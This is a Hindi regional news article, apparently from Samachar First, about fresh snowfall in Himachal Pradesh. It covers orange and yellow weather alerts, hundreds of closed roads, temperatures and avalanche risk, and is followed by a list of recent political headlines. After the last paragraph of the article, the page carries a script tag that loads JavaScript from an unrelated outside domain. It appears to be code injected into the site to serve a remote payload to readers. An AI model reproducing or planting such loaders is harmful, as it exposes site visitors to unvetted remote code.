Categories: हिमाचल

पहाड़ों पर बर्फ़बारी, 8 जिलों के लिए आरेंज आलर्ट जारी

<p>प्रदेश में फिर एक बार मौसम ने करवट बदल ली है। कल से फिर बर्फ़बारी शुरु हो गई है। जिला लाहौल-स्पीति, किन्नौर और कुल्लू के आउटर सिराज में फिर बर्फबारी का दौर शुरू हो गया है। ऊपरी इलाको में ताजा बर्फ़बारी को कारण ठंड औऱ बढ़ गई है। चंबा के सलूणी-लंगेरा, खज्जियार, लक्कड़ मंडी सहित जनजातीय क्षेत्र पांगी के आधा दर्जन रास्ते वाहनों की आवाजाही के लिए ठप हैं। प्रदेश भर में अब भी दो एनएच शिमला-रामपुर और कुल्लू-आनी समेत 470 सड़कें बंद हैं। हालांकी 5 दिन बाद शिमला शहर सहित जिले के कुछ क्षेत्रों में बस सेवा बहाल हुई है। 14 और 15 जनवरी को मौसम में सुधार होगा और इसलिए केवल पृथक स्थानों पर वर्षा होगी। इसके बाद, 16 और 17 जनवरी&nbsp; को एचपी राज्य में मौसम की गतिविधि बढ़ने की संभावना है।</p>

<p><br />
राजधानी शिमला में दिन भर आसमान पर बादल छाये रहे और बाजारों में पर्यटकों की भीड़ उमड़ी रही। मौसम विभाग के अनुसार हिमाचल में18 तक मौसम फिर सताएगा। 13 को मैदानी इलाकों ऊना, बिलासपुर, हमीरपुर और सोलन में येलो अलर्ट जारी किया है, जबकि मध्यम और ऊंचाई वाले जिलों चंबा, कांगड़ा, कुल्लू, मंडी, शिमला, सिरमौर, किन्नौर और लाहौल-स्पीति में आरेंज अलर्ट जारी किया है। केलांग का न्यूनतम तापमान – 11.3 डिग्री सेल्सियस और बिलासपुर का सबसे अधिक अधिकतम तापमान 19.0 डिग्री दर्ज किया है। प्रदेश में ऊंचाई वाले क्षेत्रों में किन्नौर, लाहुल स्पीति में हिमखंड गिरने की भी आशंका बनी हुई है। 16 जनवरी को पूरे प्रदेश में येलो अलर्ट जारी किया है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>

Samachar First

Recent Posts

झूठ व डर के सहारे सत्ता पाना चाह रहे जयराम : मुख्यमंत्री

नादौन: मुख्यमंत्री ठाकुर सुखविंदर सिंह सूक्खू ने नेता प्रतिपक्ष जयराम ठाकुर को फिर आईना दिखाया…

10 hours ago

मतदान केंद्रों में दिव्यांगों के लिए रैंप की होगी सुविधा: डीसी 

धर्मशाला, 01 मई:. जिला निर्वाचन अधिकारी उपायुक्त हेमराज बैरवा ने बुधवार को कांगड़ा विस क्षेत्र…

10 hours ago

यूनिर्वसल कार्टन लागू करने का निर्णय सराहनीय : कांग्रेस

7वें राज्य वित्तायोग के अध्यक्ष नंद लाल तथा मुख्य संसदीय सचिव मोहन लाल ब्राक्टा ने…

10 hours ago

देश ने तय कर लिया है कि आएंगे तो मोदी ही : जयराम ठाकुर

शिमला : नेता प्रतिपक्ष जयराम ठाकुर ने कहा कि भारत के इतिहास में यह पहली…

10 hours ago

फोर्टिस कांगड़ा में मरीज उठा रहे हिमकेयर सेवाओं का निःशुल्क लाभ

फोर्टिस अस्पताल कांगड़ा में हिमकेयर में अब हर सुविधा उपलब्ध है, जिसका लाभ हर वर्ग…

10 hours ago

मंडी संसदीय क्षेत्र को लेकर विक्रमादित्य सिंह ने गिनाई प्राथमिकताएं

मंडी संसदीय सीट से कांग्रेस प्रत्याशी विक्रमादित्य सिंह ने बीजेपी और मंडी भाजपा कंगना रनौत…

10 hours ago